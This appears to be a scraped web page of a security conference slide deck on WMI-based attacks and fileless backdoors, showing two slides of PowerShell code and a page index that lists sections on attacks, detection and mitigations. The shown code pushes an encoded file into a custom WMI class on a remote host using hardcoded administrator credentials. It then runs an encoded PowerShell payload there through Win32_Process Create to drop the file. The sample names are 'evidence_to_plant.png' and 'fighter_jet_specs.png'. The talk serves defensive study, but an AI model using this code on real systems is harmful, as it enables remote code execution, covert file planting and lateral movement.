Persistent Asynchronous and Fileless Backdoor

More documents

Recommendations

Info

WMI Attacks – C2 Communication (WMI Class) – “Push” AttackPush file contents to remote WMI repository# Prep file to drop on remote system$LocalFilePath = 'C:\Users\ht\Documents\evidence_to_plant.png'$FileBytes = [IO.File]::ReadAllBytes($LocalFilePath)$EncodedFileContentsToDrop = [Convert]::ToBase64String($FileBytes)# Establish remote WMI connection$Options = New-Object Management.ConnectionOptions$Options.Username = 'Administrator'$Options.Password = 'user'$Options.EnablePrivileges = $True$Connection = New-Object Management.ManagementScope$Connection.Path = '\\192.168.72.134\root\default'$Connection.Options = $Options$Connection.Connect()# "Push" file contents$EvilClass = New-Object Management.ManagementClass($Connection, [String]::Empty, $null)$EvilClass['__CLASS'] = 'Win32_EvilClass'$EvilClass.Properties.Add('EvilProperty', [Management.CimType]::String, $False)$EvilClass.Properties['EvilProperty'].Value = $EncodedFileContentsToDrop$EvilClass.Put()
WMI Attacks – C2 Communication (WMI Class) – “Push” AttackDrop file contents to remote system$Credential = Get-Credential 'WIN-B85AAA7ST4U\Administrator'$CommonArgs = @{Credential = $CredentialComputerName = '192.168.72.134'}$PayloadText = @'$EncodedFile = ([WmiClass] 'root\default:Win32_EvilClass').Properties['EvilProperty'].Value[IO.File]::WriteAllBytes('C:\fighter_jet_specs.png', [Convert]::FromBase64String($EncodedFile))'@$EncodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($PayloadText))$PowerShellPayload = "powershell -NoProfile -EncodedComm<strong>and</strong> $EncodedPayload"# Drop it like it's hotInvoke-WmiMethod @CommonArgs -Class Win32_Process -Name Create -ArgumentList $PowerShellPayload# Confirm successful file dropGet-WmiObject @CommonArgs -Class CIM_DataFile -Filter 'Name = "C:\\fighter_jet_specs.png"'
Page 4 and 5: Fact - Attackers are abusing WMI1.
Page 8: Outline1. Abridged History of WMI M
Page 11 and 12: 2010 - Ghost• Utilized permanent
Page 13 and 14: WMI Basics
Page 15 and 16: WMI Basics - Architecture• WMI im
Page 18 and 19: Interacting with WMI
Page 20 and 21: Utilities - wmic.exe• Pentesters
Page 22 and 23: Utilities - wbemtest.exe• The WMI
Page 24 and 25: Utilities• Linux - wmic, wmis, wm
Page 26 and 27: Remote WMI Protocols - DCOM• DCOM
Page 28 and 29: Remote WMI Protocols - WinRM/PowerS
Page 30 and 31: Remote WMI Protocols - WinRM/PowerS
Page 32 and 33: WMI Eventing
Page 34 and 35: WMI Event Type - Intrinsic• Intri
Page 36 and 37: WMI Event - Filters• The definiti
Page 38 and 39: WMI Attacks
Page 40 and 41: WMI - Benefits to an Attacker• Se
Page 42 and 43: WMI Attacks - VM/Sandbox Detection
Page 44 and 45: WMI Attacks - Code Execution and La
Page 46 and 47: WMI Attacks - Data Storage$StaticCl
Page 50 and 51: WMI Attacks - C2 Communication (Reg
Page 52 and 53: WMI Attacks - Stealthy Command “P
Page 54 and 55: WMI Providers
Page 56 and 57: 3 rd Party WMI Providers• Some 3
Page 58 and 59: WMI Provider Enumeration• Get-Wmi
Page 60 and 61: PoC WMI Backdoor Background• A pu
Page 62 and 63: PoC WMI Backdoor Syntax - New-WMIBa
Page 64 and 65: PoC WMI Backdoor - Examples$Trigger
Page 66 and 67: Attacker Detection with WMI• Pers
Page 68 and 69: Attacker Detection with WMIWMI is t
Page 70 and 71: Mitigations
Page 72 and 73: Thank you!• Valuable input on use

Persistent Asynchronous and Fileless Backdoor

Create successful ePaper yourself

Delete template?

Save as template?